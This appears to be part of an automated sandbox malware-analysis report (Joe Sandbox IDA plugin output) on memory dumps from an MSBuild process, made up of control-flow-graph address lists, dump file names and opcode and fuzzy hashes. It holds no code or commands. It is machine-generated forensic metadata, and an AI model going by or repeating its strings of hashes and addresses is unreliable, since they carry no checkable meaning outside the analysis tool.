                                                control_flow_graph 4321 2b1a84f-2b1a854 4322 2b1a856-2b1a857 4321->4322 4323 2b1a86f-2b1a872 4321->4323 4326 2b1a841-2b1a84d 4322->4326 4327 2b1a858-2b1a85a 4322->4327 4324 2b1a874-2b1a875 4323->4324 4325 2b1a8bb-2b1a8c0 4323->4325 4328 2b1a877-2b1a87c 4324->4328 4329 2b1a85b-2b1a86b 4324->4329 4332 2b1a8c8-2b1a8cf 4325->4332 4326->4321 4330 2b1a90b 4326->4330 4327->4329 4328->4330 4331 2b1a882-2b1a885 4328->4331 4329->4323 4335 2b1a910-2b1a94f 4330->4335 4331->4330 4334 2b1a88b-2b1a8aa 4331->4334 4336 2b1a8d1-2b1a8d7 4332->4336 4337 2b1a8fe-2b1a908 4332->4337 4334->4330 4348 2b1a8ac-2b1a8b2 4334->4348 4342 2b1a951-2b1a954 4335->4342 4343 2b1a957-2b1a95f 4335->4343 4336->4335 4338 2b1a8d9-2b1a8f6 4336->4338 4338->4337 4342->4343 4345 2b1a961-2b1a967 4343->4345 4346 2b1a9c7-2b1a9ce 4343->4346 4345->4346 4351 2b1a969-2b1a96f 4345->4351 4349 2b1aad3-2b1aadc 4346->4349 4350 2b1a9d4-2b1a9db 4346->4350 4348->4335 4354 2b1a8b4-2b1a8b8 4348->4354 4355 2b1aae6-2b1aae9 4349->4355 4356 2b1aade-2b1aae4 4349->4356 4357 2b1a9e1-2b1a9e9 4350->4357 4358 2b1aa8a-2b1aa90 4350->4358 4352 2b1a975-2b1a982 4351->4352 4353 2b1abf9-2b1ac01 4351->4353 4352->4353 4359 2b1a988-2b1a9b0 4352->4359 4370 2b1ac03-2b1ac2f 4353->4370 4371 2b1ac37-2b1ac3c 4353->4371 4354->4325 4362 2b1abf4 4355->4362 4363 2b1aaef-2b1aafd 4355->4363 4356->4355 4361 2b1ab00-2b1ab04 4356->4361 4357->4362 4364 2b1a9ef-2b1a9f8 4357->4364 4358->4353 4360 2b1aa96-2b1aaa0 4358->4360 4359->4362 4399 2b1a9b6-2b1a9b9 4359->4399 4360->4353 4368 2b1aaa6-2b1aac2 4360->4368 4366 2b1ab87-2b1ab8b 4361->4366 4367 2b1ab0a-2b1ab13 4361->4367 4362->4353 4363->4361 4364->4353 4369 2b1a9fe-2b1aa31 4364->4369 4374 2b1abea-2b1abf1 4366->4374 4375 2b1ab8d-2b1ab96 4366->4375 4367->4366 4372 2b1ab15-2b1ab1b 4367->4372 4400 2b1aaca-2b1aacd 4368->4400 4403 2b1aa33 4369->4403 4404 2b1aa7b-2b1aa88 4369->4404 4388 2b1ac31-2b1ac35 4370->4388 4389 2b1ac3e-2b1ac42 4370->4389 4371->4389 4372->4353 4379 2b1ab21-2b1ab2b 4372->4379 4375->4362 4377 2b1ab98-2b1ab9f 4375->4377 4377->4374 4382 2b1aba1 4377->4382 4379->4353 4384 2b1ab31-2b1ab3e 4379->4384 4386 2b1aba4-2b1abac 4382->4386 4384->4353 4390 2b1ab44-2b1ab6f 4384->4390 4393 2b1abe0-2b1abe3 4386->4393 4394 2b1abae-2b1abba 4386->4394 4388->4371 4406 2b1ac54 4389->4406 4407 2b1ac44-2b1ac52 4389->4407 4390->4353 4423 2b1ab75-2b1ab7d 4390->4423 4393->4362 4401 2b1abe5-2b1abe8 4393->4401 4394->4353 4396 2b1abbc-2b1abd8 4394->4396 4396->4393 4399->4362 4405 2b1a9bf-2b1a9c5 4399->4405 4400->4349 4400->4362 4401->4374 4401->4386 4409 2b1aa36-2b1aa3c 4403->4409 4404->4400 4405->4345 4405->4346 4411 2b1ac56-2b1ac58 4406->4411 4407->4411 4409->4353 4415 2b1aa42-2b1aa63 4409->4415 4412 2b1ac5a-2b1ac5c 4411->4412 4413 2b1ac5e-2b1ac66 4411->4413 4412->4413 4416 2b1ac89-2b1ac8b 4413->4416 4417 2b1ac68-2b1ac7a 4413->4417 4415->4362 4432 2b1aa69-2b1aa6d 4415->4432 4420 2b1acb9-2b1acca 4416->4420 4421 2b1ac8d-2b1ac9a call 2b1a340 4416->4421 4417->4416 4428 2b1ac7c-2b1ac87 4417->4428 4421->4420 4431 2b1ac9c-2b1acab 4421->4431 4423->4362 4426 2b1ab7f-2b1ab85 4423->4426 4426->4366 4426->4372 4428->4416 4431->4420 4436 2b1acad-2b1acb7 4431->4436 4432->4362 4434 2b1aa73-2b1aa79 4432->4434 4434->4404 4434->4409 4436->4420
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b542a86ead8bd2d386e1ca3b69b7412e72999409564d6a3f8c3e1659f3f1b915
                                                • Instruction ID: b22fd89b0146f0261a339dbc37b674cf059dad4e3381852f56a6ca731d6d1e2f
                                                • Opcode Fuzzy Hash: b542a86ead8bd2d386e1ca3b69b7412e72999409564d6a3f8c3e1659f3f1b915
                                                • Instruction Fuzzy Hash: 57F12D71A012558FCB04CF68D984AAEBBF2FF88314B5A8099E515EB365CB35EC41CB50

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 4169 2b10c8f-2b10cc0 4171 2b10cc2 4169->4171 4172 2b10cc7-2b10d10 call 2b1070c 4169->4172 4171->4172 4179 2b10d15 4172->4179 4180 2b10d1e-2b10eda call 2b1070c * 7 4179->4180 4223 2b10ee2-2b10eeb 4180->4223 4299 2b10eee call 2b11f61 4223->4299 4300 2b10eee call 2b11f08 4223->4300 4224 2b10ef4-2b10f1e call 2b13428 call 2b13908 4227 2b10f24-2b10f4e 4224->4227 4230 2b10f57-2b10f5a call 2b14ad9 4227->4230 4231 2b10f60-2b10f8a 4230->4231 4234 2b10f93 4231->4234 4305 2b10f96 call 2b1b4f2 4234->4305 4306 2b10f96 call 2b1b264 4234->4306 4307 2b10f96 call 2b1b328 4234->4307 4235 2b10f9c-2b10fc6 4238 2b10fcf-2b10fd5 call 2b1bbb8 4235->4238 4239 2b10fdb-2b11017 4238->4239 4242 2b11023-2b11029 call 2b1beb0 4239->4242 4243 2b1102f-2b1106b 4242->4243 4246 2b11077-2b1107d call 2b1c190 4243->4246 4247 2b11083-2b110bf 4246->4247 4250 2b110cb-2b110d1 call 2b1c473 4247->4250 4251 2b110d7-2b11113 4250->4251 4254 2b1111f 4251->4254 4297 2b11125 call 2b1c473 4254->4297 4298 2b11125 call 2b1c752 4254->4298 4255 2b1112b-2b11167 4258 2b11173-2b11179 call 2b1ca32 4255->4258 4259 2b1117f-2b1122a 4258->4259 4267 2b11235-2b11241 call 2b1cd10 4259->4267 4268 2b11247-2b11253 4267->4268 4269 2b1125e-2b1126a call 2b1cd10 4268->4269 4270 2b11270-2b1127c 4269->4270 4271 2b11287-2b11293 call 2b1cd10 4270->4271 4272 2b11299-2b112a5 4271->4272 4273 2b112b0-2b112bc call 2b1cd10 4272->4273 4274 2b112c2-2b112ce 4273->4274 4275 2b112d9-2b112e5 call 2b1cd10 4274->4275 4276 2b112eb-2b112f7 4275->4276 4277 2b11302-2b1130e call 2b1cd10 4276->4277 4278 2b11314-2b11320 4277->4278 4279 2b1132b-2b11337 call 2b1cd10 4278->4279 4280 2b1133d-2b11349 4279->4280 4281 2b11354-2b11360 call 2b1cd10 4280->4281 4282 2b11366-2b11372 4281->4282 4283 2b1137d-2b11389 call 2b1cd10 4282->4283 4284 2b1138f-2b1139b 4283->4284 4285 2b113a6-2b113b2 call 2b1cd10 4284->4285 4286 2b113b8-2b1146b 4285->4286 4297->4255 4298->4255 4299->4224 4300->4224 4305->4235 4306->4235 4307->4235
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 202d3febdd8a668fe071bce34e9bdfb69c58bc76fe95f8e871fc8964f0abab73
                                                • Instruction ID: 505461ed503e982c2cc16b3a6826927437be4fcf06f736a82344a90e3bc0f2d6
                                                • Opcode Fuzzy Hash: 202d3febdd8a668fe071bce34e9bdfb69c58bc76fe95f8e871fc8964f0abab73
                                                • Instruction Fuzzy Hash: E722857490021ADFCB54EF64E889B9DBBB2BF48301F1185AAD549A7354DF306D86CF44

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 4438 2b10ca0-2b10cc0 4439 2b10cc2 4438->4439 4440 2b10cc7-2b10eeb call 2b1070c * 8 4438->4440 4439->4440 4566 2b10eee call 2b11f61 4440->4566 4567 2b10eee call 2b11f08 4440->4567 4492 2b10ef4-2b10f93 call 2b13428 call 2b13908 call 2b14ad9 4572 2b10f96 call 2b1b4f2 4492->4572 4573 2b10f96 call 2b1b264 4492->4573 4574 2b10f96 call 2b1b328 4492->4574 4503 2b10f9c-2b1111f call 2b1bbb8 call 2b1beb0 call 2b1c190 call 2b1c473 4564 2b11125 call 2b1c473 4503->4564 4565 2b11125 call 2b1c752 4503->4565 4523 2b1112b-2b113b2 call 2b1ca32 call 2b1cd10 * 10 4554 2b113b8-2b1146b 4523->4554 4564->4523 4565->4523 4566->4492 4567->4492 4572->4503 4573->4503 4574->4503
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5d22f531f951adbc9f63ab5536edf0b4594b3c889c6185bb9d0fe2483e116db9
                                                • Instruction ID: 17084dfbe127346625066da70235e15c74ac9fe4496452d38cfc8ac49549b383
                                                • Opcode Fuzzy Hash: 5d22f531f951adbc9f63ab5536edf0b4594b3c889c6185bb9d0fe2483e116db9
                                                • Instruction Fuzzy Hash: E922857890021ADFCB54EF64E889B9DBBB2BF48301F1185AAD949A7354DF30AD85CF44

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 4686 2b156a8-2b156ca 4687 2b156e0-2b156eb 4686->4687 4688 2b156cc-2b156d0 4686->4688 4691 2b156f1-2b156f3 4687->4691 4692 2b15793-2b157bf 4687->4692 4689 2b156d2-2b156de 4688->4689 4690 2b156f8-2b156ff 4688->4690 4689->4687 4689->4690 4694 2b15701-2b15708 4690->4694 4695 2b1571f-2b15728 4690->4695 4693 2b1578b-2b15790 4691->4693 4698 2b157c6-2b1581e 4692->4698 4694->4695 4696 2b1570a-2b15715 4694->4696 4789 2b1572a call 2b156a8 4695->4789 4790 2b1572a call 2b15698 4695->4790 4696->4698 4699 2b1571b-2b1571d 4696->4699 4718 2b15820-2b15826 4698->4718 4719 2b1582d-2b1583f 4698->4719 4699->4693 4700 2b15730-2b15732 4701 2b15734-2b15738 4700->4701 4702 2b1573a-2b15742 4700->4702 4701->4702 4704 2b15755-2b15774 call 2b16108 4701->4704 4705 2b15751-2b15753 4702->4705 4706 2b15744-2b15749 4702->4706 4712 2b15776-2b1577f 4704->4712 4713 2b15789 4704->4713 4705->4693 4706->4705 4787 2b15781 call 2b1a650 4712->4787 4788 2b15781 call 2b1a70d 4712->4788 4713->4693 4715 2b15787 4715->4693 4718->4719 4721 2b158d3-2b158d5 4719->4721 4722 2b15845-2b15849 4719->4722 4795 2b158d7 call 2b15a70 4721->4795 4796 2b158d7 call 2b15a60 4721->4796 4723 2b15859-2b15866 4722->4723 4724 2b1584b-2b15857 4722->4724 4732 2b15868-2b15872 4723->4732 4724->4732 4725 2b158dd-2b158e3 4726 2b158e5-2b158eb 4725->4726 4727 2b158ef-2b158f6 4725->4727 4730 2b15951-2b1599f 4726->4730 4731 2b158ed 4726->4731 4791 2b159a1 call 6782188 4730->4791 4792 2b159a1 call 6781f80 4730->4792 4793 2b159a1 call 6781f71 4730->4793 4731->4727 4735 2b15874-2b15883 4732->4735 4736 2b1589f-2b158a3 4732->4736 4744 2b15893-2b1589d 4735->4744 4745 2b15885-2b1588c 4735->4745 4737 2b158a5-2b158ab 4736->4737 4738 2b158af-2b158b3 4736->4738 4741 2b158f9-2b1594a 4737->4741 4742 2b158ad 4737->4742 4738->4727 4743 2b158b5-2b158b9 4738->4743 4741->4730 4742->4727 4746 2b159b7-2b159db 4743->4746 4747 2b158bf-2b158d1 4743->4747 4744->4736 4745->4744 4755 2b159e1-2b159e3 4746->4755 4756 2b159dd-2b159df 4746->4756 4747->4727 4757 2b159e5-2b159e9 4755->4757 4758 2b159f4-2b159f6 4755->4758 4761 2b15a59-2b15a5c 4756->4761 4762 2b159eb-2b159ed 4757->4762 4763 2b159ef-2b159f2 4757->4763 4764 2b15a09-2b15a0f 4758->4764 4765 2b159f8-2b159fc 4758->4765 4762->4761 4763->4761 4770 2b15a11-2b15a38 4764->4770 4771 2b15a3a-2b15a3c 4764->4771 4767 2b15a02-2b15a07 4765->4767 4768 2b159fe-2b15a00 4765->4768 4767->4761 4768->4761 4773 2b15a43-2b15a45 4770->4773 4771->4773 4777 2b15a47-2b15a49 4773->4777 4778 2b15a4b-2b15a4d 4773->4778 4774 2b159a7-2b159b0 4774->4746 4777->4761 4779 2b15a56 4778->4779 4780 2b15a4f-2b15a54 4778->4780 4779->4761 4780->4761 4787->4715 4788->4715 4789->4700 4790->4700 4791->4774 4792->4774 4793->4774 4795->4725 4796->4725
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 455b9dd2a1e7912c2a75197a22b7da72419fdde635ff572d51b8c71c945e8bef
                                                • Instruction ID: 0da0cf961439e9cd9b4f8e9184ec63a868f15e64c0b529e7af5c317e2bea8483
                                                • Opcode Fuzzy Hash: 455b9dd2a1e7912c2a75197a22b7da72419fdde635ff572d51b8c71c945e8bef
                                                • Instruction Fuzzy Hash: 83B1DA317102008FDB259F78D898B3A7BA2FFC9254F9885A9E816CB380DF74D841CB94
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d599d6c4f9b2f987f1e8d8642c026a6894378539c6fa8da8a45e996d4aadc731
                                                • Instruction ID: bad35e4b10299f02e74930f743b4dafc9f57966b53b3cfe27b1d5578eb9ef89a
                                                • Opcode Fuzzy Hash: d599d6c4f9b2f987f1e8d8642c026a6894378539c6fa8da8a45e996d4aadc731
                                                • Instruction Fuzzy Hash: 51810130B501068FCB58EF78D854A7E77B6BF89601B2181A9E125DB3A2DB31DD02CBD5
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e54808a4d0b212ad56a7b6ae486fe58494c8bbfe46f70f89017b02b45522f157
                                                • Instruction ID: 3f30d5a48c85db0fe0c17272e761fa740442fe2901859f6303eb53a0c0e20f15
                                                • Opcode Fuzzy Hash: e54808a4d0b212ad56a7b6ae486fe58494c8bbfe46f70f89017b02b45522f157
                                                • Instruction Fuzzy Hash: B4819F35B00505CFCB24DF69C888AAAB7F2FFC9214BE481A9D415EB365DB31E841CB90
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c77c6d9d827d5f7adf39958c217fa5cfab118b7367d0f65821639953cfcbf3be
                                                • Instruction ID: c12a4555dd187d617db631a54fb511ee1daa4e9121ffd5bb109470510c4244bf
                                                • Opcode Fuzzy Hash: c77c6d9d827d5f7adf39958c217fa5cfab118b7367d0f65821639953cfcbf3be
                                                • Instruction Fuzzy Hash: D771A231F002199FDB55EFA9C8546AEBBB2AFC8600F148129E516A7380EF349D46CB95
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c7c08af37089554ec647a6a79a1ae3758ec8c88a8680e20ee6dfcf23bb185e7a
                                                • Instruction ID: e1b2d88a3d7aa7b05276d1f0bc279ea68a90ec2337b5cf1ff1c74a1e7c3982d7
                                                • Opcode Fuzzy Hash: c7c08af37089554ec647a6a79a1ae3758ec8c88a8680e20ee6dfcf23bb185e7a
                                                • Instruction Fuzzy Hash: 4F71E5347002058FCB15DF29C898AAABBE6EF49604B9940E9E806CB3B1DF70DD41DB90
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4e4b65e2674683ec19aa4081dfaf75ed87216c07b9382ec82b0bdf54f9090ef5
                                                • Instruction ID: f9e08ae849dc9e51977cd0878862aed4971c95c9da6cee52cb9946ec2461e1ad
                                                • Opcode Fuzzy Hash: 4e4b65e2674683ec19aa4081dfaf75ed87216c07b9382ec82b0bdf54f9090ef5
                                                • Instruction Fuzzy Hash: D251BC34875356DFD2082B20B1AE12BBFA5EF6F3137906C00F01E99095CF34A4569F28
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c78508a46634e4eec72c2ab2fccf696c1e5fcf543099dccb95f816b820613fa5
                                                • Instruction ID: 9b62988ad36ed3f40c57bfd9296d4c40a14da6f69bd3834af630dedca0cb1239
                                                • Opcode Fuzzy Hash: c78508a46634e4eec72c2ab2fccf696c1e5fcf543099dccb95f816b820613fa5
                                                • Instruction Fuzzy Hash: 9051AB348B5356DFD2082B20B2AE12BBFA5FF6F3137906D00F01E99095CF74A4569E68
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 455a1ee4eba232dea37e8b586726b8744cffbeed99287ea107d5a6feb76fb876
                                                • Instruction ID: eebcfe698afa8e8346b5816099c334b94ea481801264741c924b0ba4d640d6bc
                                                • Opcode Fuzzy Hash: 455a1ee4eba232dea37e8b586726b8744cffbeed99287ea107d5a6feb76fb876
                                                • Instruction Fuzzy Hash: 7851E571E403599FDB11EFA9C890AFEBBB1AF85700F18815AE515B7241EB30AD45CBE0
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e97e714a4a9ee9aa35a778b1db1713ac9ee544394d7d483afe5a12ee50a263a5
                                                • Instruction ID: 48d364115d3eed5650f0760eaad4917ae4e3826969f1ab36d923701e9357ff2e
                                                • Opcode Fuzzy Hash: e97e714a4a9ee9aa35a778b1db1713ac9ee544394d7d483afe5a12ee50a263a5
                                                • Instruction Fuzzy Hash: 9F611274D01219CFDB15EFA4D858BAEBBB2FF88301F608529D805AB395DB359A46CF40
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bc9eba4e045b5b3223169f60f6a51e02e7e9c2e016a032e853f6217b539c293d
                                                • Instruction ID: 0da59070df72edcc6faebb12f662a35046f707fc47887c0a26eac05863dce9d9
                                                • Opcode Fuzzy Hash: bc9eba4e045b5b3223169f60f6a51e02e7e9c2e016a032e853f6217b539c293d
                                                • Instruction Fuzzy Hash: FB512734B8511ACFD798FB28D894A6A73B1FF583557928864E402DB3A4CB31EC12CF90
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 945bdc4722e0e4eef2d264d80ddf00972cb35d496dce02fa7f569017af2847ef
                                                • Instruction ID: 4a5619ccf1efff265b8941f3f187ce80c492a86a1483f0284f915972ad6bab0e
                                                • Opcode Fuzzy Hash: 945bdc4722e0e4eef2d264d80ddf00972cb35d496dce02fa7f569017af2847ef
                                                • Instruction Fuzzy Hash: 70518074E012189FDB48DFA9D58499DBBF2FF89300F20816AE419AB365DB31A806CF10
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e0faf4d789ee0a344db887ad65515d4c8af08ecf4c96844a54bfa6a74f38db2c
                                                • Instruction ID: 63277598752df4affd7c6e5eb219ffb973a5396a708686e9a03bc8d09578b5db
                                                • Opcode Fuzzy Hash: e0faf4d789ee0a344db887ad65515d4c8af08ecf4c96844a54bfa6a74f38db2c
                                                • Instruction Fuzzy Hash: 3D518275E11208DFCB48DFA9D49499DBBB2FF8D300B60946AE809AB364DB31AD45CF40
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d64719a8d235db5cd95a6d5825b9e698fb2242e6fb17bc0f2dafe49d6e734d80
                                                • Instruction ID: f888b17296841aadc837467396c1b7aa24fc05544b29a34bddb60661d35dd474
                                                • Opcode Fuzzy Hash: d64719a8d235db5cd95a6d5825b9e698fb2242e6fb17bc0f2dafe49d6e734d80
                                                • Instruction Fuzzy Hash: 2551E079E01249CFDB54EFA9E5847EDBBF2EB88310F10902AD405A7294EB346A46CF54
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e25bb7ca8a28f55491f7c1fce47061f1f2ada31e788317c86f2cc5ad8f6b4e74
                                                • Instruction ID: 47500486511cffb75f40b604e13980d0d2e45d43a8539d4371d98e97378dbc85
                                                • Opcode Fuzzy Hash: e25bb7ca8a28f55491f7c1fce47061f1f2ada31e788317c86f2cc5ad8f6b4e74
                                                • Instruction Fuzzy Hash: C441D231A04689DFCF11CFA8C854B9EBFB2FF49354F448195E8619B2A1D735E914CBA0
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f56e0e4d87b35f4297a9162198af4078f40928d4c9adf22253903210c2173e4a
                                                • Instruction ID: 8088f0d2a7fe17564fa8b63fa54177650223666f2c04db6794e5a1a7f2f3cc54
                                                • Opcode Fuzzy Hash: f56e0e4d87b35f4297a9162198af4078f40928d4c9adf22253903210c2173e4a
                                                • Instruction Fuzzy Hash: 82414B31A442438FCB54FB38D89457E7BA6BF8125079646BAE416CB263DB30DC42C791
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4f492438a18b8b833823ffe15cc54b3204d063db08f245ff7c28be95f61d213d
                                                • Instruction ID: 9012c41a7d0140e1e394d2c57acfb6cbc90a3ab30f4932ffc655b9cbf30a95ee
                                                • Opcode Fuzzy Hash: 4f492438a18b8b833823ffe15cc54b3204d063db08f245ff7c28be95f61d213d
                                                • Instruction Fuzzy Hash: C541CE357013048FCB05AF78E9686AE7BF2BF88211F148469E916D7390CF34AD06CB94
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 765594f82124820e114830d4c90627c6ae39dcc9264125e02ded7b1707fb6d03
                                                • Instruction ID: 217c180d5c693fcaa74a85667e96c1bbf6e422b599e529b699d06a6e99e5ad3b
                                                • Opcode Fuzzy Hash: 765594f82124820e114830d4c90627c6ae39dcc9264125e02ded7b1707fb6d03
                                                • Instruction Fuzzy Hash: FF31E431B003258BDF199AAA559527E79DAEBC4710F5C04F9E906D3380FF74CC458691
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0e28c6a751d242d0a325627e4a50734080e4d647e7332de338ab08af46c4a54f
                                                • Instruction ID: 18dcf0913c2cb84231a255f63d371792e47e3492518293f5da988e47d96e54a3
                                                • Opcode Fuzzy Hash: 0e28c6a751d242d0a325627e4a50734080e4d647e7332de338ab08af46c4a54f
                                                • Instruction Fuzzy Hash: 1F41AE74E01259DFDB44EFA9D5887EEBBF2EF88304F20902AD405A7294EB346946CF54
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: abccfd1a686b448554444164ccdf27a7d46c8232c846b13984c53ecffd23e7d4
                                                • Instruction ID: 1de0e666f3ac5fc1cfc0e1f11ae7bd412f3c0762e653fd073d72068b3811e808
                                                • Opcode Fuzzy Hash: abccfd1a686b448554444164ccdf27a7d46c8232c846b13984c53ecffd23e7d4
                                                • Instruction Fuzzy Hash: 7C31703221020A9FCB099F68E494AAF3BB2FF98704F444455F9158B291CF75DD62DB94
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 46340207ce0e0d4ba4c341742b974217ee7f7e23b7a8aff1b385c1169ebc052d
                                                • Instruction ID: 9b6804f4d3c617dbad68ac69d3431619287b490a9461491fba72ff13e3d8e185
                                                • Opcode Fuzzy Hash: 46340207ce0e0d4ba4c341742b974217ee7f7e23b7a8aff1b385c1169ebc052d
